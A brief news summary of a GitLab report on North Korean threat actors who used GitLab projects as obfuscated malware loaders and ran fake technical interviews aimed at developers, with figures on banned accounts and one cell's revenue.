A technical analysis by GitLab found North Korean threat actors used GitLab projects as obfuscated loaders for malware and that 131 North Korean-attributed accounts were banned last year.
KEY FACTS
- Accounts banned 131 North Korean-attributed GitLab accounts removed last year
- Primary method Projects used as obfuscated loaders for payloads such as BeaverTail and Ottercookie
- Campaign Contagious Interview scams lure developers with fake technical interviews
- Cell revenue One eight-person cell reported $1.64 million from Q1 2022 to Q3 2025
Activity began as early as 2019 and accelerated in 2022. The platform removed suspect repositories as part of disruption efforts during the most recent year.
Projects frequently served as obfuscated loaders that retrieved malware hosted off-platform. The tradecraft evolved to include malicious NPM dependencies, sandbox detection, and invite-only private projects.
Actors adopted AI to produce custom obfuscators and to automate large numbers of synthetic identities. One operator assembled 21 personas by pairing images with stolen scans of US identity documents. Some repositories contained personnel dossiers, passport scans and bank records.
One likely Beijing-based cell of eight members recorded $1.64 million in revenue between Q1 2022 and Q3 2025 and had earnings above $11,000 per member in Q3 2025. Operators commonly used consumer VPNs and sometimes routed access through VPS infrastructure or laptop farms. Targets included US-based developers, fintech firms, contractors on freelancing platforms and smaller organizations hiring remote developers.
WHY IT MATTERS
Weaponizing trust in recruitment lets attackers bypass perimeter controls by convincing developers to run malicious code. The report includes detailed indicators of compromise intended to help defenders strengthen detection and response.